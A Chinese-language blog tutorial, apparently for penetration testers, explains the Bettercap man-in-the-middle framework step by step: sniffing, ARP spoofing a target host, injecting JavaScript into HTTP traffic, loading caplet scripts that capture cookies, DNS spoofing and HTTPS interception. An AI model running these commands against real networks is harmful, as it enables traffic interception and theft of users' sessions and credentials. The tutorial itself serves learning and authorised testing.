的过滤器使用变量_中间人攻击之Bettercap工具使用

本文介绍了Bettercap工具的使用,包括其基本命令、嗅探模块net.sniff、ARP欺骗、JS注入、脚本加载、DNS欺骗和HTTPS嗅探。通过这些功能,Bettercap可以进行中间人攻击,实现网络流量的监控和篡改。注意,文章仅供学习参考,实际操作可能涉及非法活动。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

注:本文仅供参考学习

0x01 Bettercap 简介
0x02 Bettercap 模块与基本命令
0x03 Bettercap 嗅探模块
0x04 Bettercap arp欺骗
0x05 Bettercap 注入js
0x06 Bettercap 加载脚本
0x07 Bettercap dns欺骗
0x08 Bettercap https嗅探

0x01 Bettercap简介

Bettercap是一个非常强大、灵活可移植的中间人攻击框架,它具有跨平台、轻量级以及模块化等优点,在渗透测试过程中能够非常好的进行中间人测试。在Kali Linux上可以通过apt install bettercap直接安装。使用Bettercap时并不需要Cain和Ettercap一样手动扫描内网主机,在打开时会选择正在上网网卡自动完成扫描任务并实时发现网络中新接入的设备。
新版的界面也十分友好,跟msf有点相似,也是设置变量然后运行。

0x02 Bettercap模块与基本命令

在启用Bettercap时可以通过-h获取帮助信息

59e5293d32b5a1dc86017d89c79bdda3.png

查看模块 help
runnning 表示正在运行
not running 表示未启用

270be621512eac68ce1721f26560eb34.png

模块介绍

b9492993c753dac5d82a441471a5a91b.png

net.show 查看缓存列表

1560edca5757ee79995873014d72fa66.png

help module 查看模块参数信息

f1a84aa4d8e7812a5d6d34f3ac973ce4.png

get name 获取变量值设置信息

18d49deecea0d4b3d0b94ca8421a40b3.png

set name 设置变量

264e5cdd74ee05b4eff6d07b70e7a25f.png

设置好变量后可以进行攻击
module on/off 开始攻击或者关闭

6daa8741781c9432c992909fc6927a74.png

0x03 Bettercap嗅探模块net.sniff
这个嗅探模块跟wireshark工具差不多 wireshark也可以实现

052ac4482f4249c24f68d66ae27b9b27.png

net.sniff on 开启模块
net.sniff stats 查看模块变量

9668a05615bdd26fa352b847d0f867cf.png

想要设定特殊目标可以选择参数,相当于wireshark的过滤器吧

e2a7e9db9647ad9046413ba149b90d1a.png

0x04 Bettercap arp欺骗

查看arp.shoof模块
arp.spoof on 双向欺骗
arp.ban on(指不发送包给网关,会断网)

dab9b2c8529627615ce0552c61df76db.png

设置欺骗目标(如不设置 则欺骗所有)
set arp.spoof.targets 192.168.1.100
开启攻击 arp.spoof on

b5c7554c6e9588696b586febba9d1cc7.png
可以看到已成功欺骗网关mac地址,此时被攻击者的所有流量都将经过攻击者

0x05 Bettercap注入js
首先开启arp欺骗

75148cfda813f2c4500ac7d90abcd4be.png

bebdee1dfc398eaa9a71f4030ddfe3c1.png

打开http.proxy模块
设置注入脚本
set http.proxy.injectjs alert(123456)
开启注入
http.proxy on

133bf88347df747d38c8540f86c77a6f.png

915f2601a50ceebd52482c80ba465ee7.png

注入成功 还有许多骚操作师傅们可自行尝试

0x06 Bettercap 加载脚本

在GitHub上有许多Bettercap的脚本
链接 https://github.com/bettercap/caplets
cap为脚本使用文档

26afa577ef1942fcb555eaa3e0e3535f.png

使用加载脚本模块
http.proxy.script /脚本位置
http.proxy on 开启攻击

3c595aeaac0feeaaf248c0d2a80a1a66.png

可以看到成功运行脚本 该脚本是查看详细信息的 获取cookie等信息
师傅们可以自行重写 js 脚本实现自定义的功能

0x07 Bettercap dns欺骗

首先要arp欺骗
然后进入dns.spoof模块
set dns.spoof.address 1.1.1.1 设置指向的IP
set dns.spoof.domains baidu.com 设置欺骗的网址
dns.spoof on 开启dns欺骗

9cae0d40420c8fc6da59b2d142963ba8.png

0x08 Bettercap https嗅探

原理:Bettercap在劫持https的时候,会先把网站解析到本地服务,然后伪造HTTPS让受害者登录。
使用https.proxy模块
set https.proxy.script caplets/http-req-dump/http-req-dump.js 设置脚本
https.proxy on 开启攻击

d83cdd6b46407578c5e775a6c71a0211.png

Bettercap工具暂时总结到这,如有错误,欢迎各位师傅矫正。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值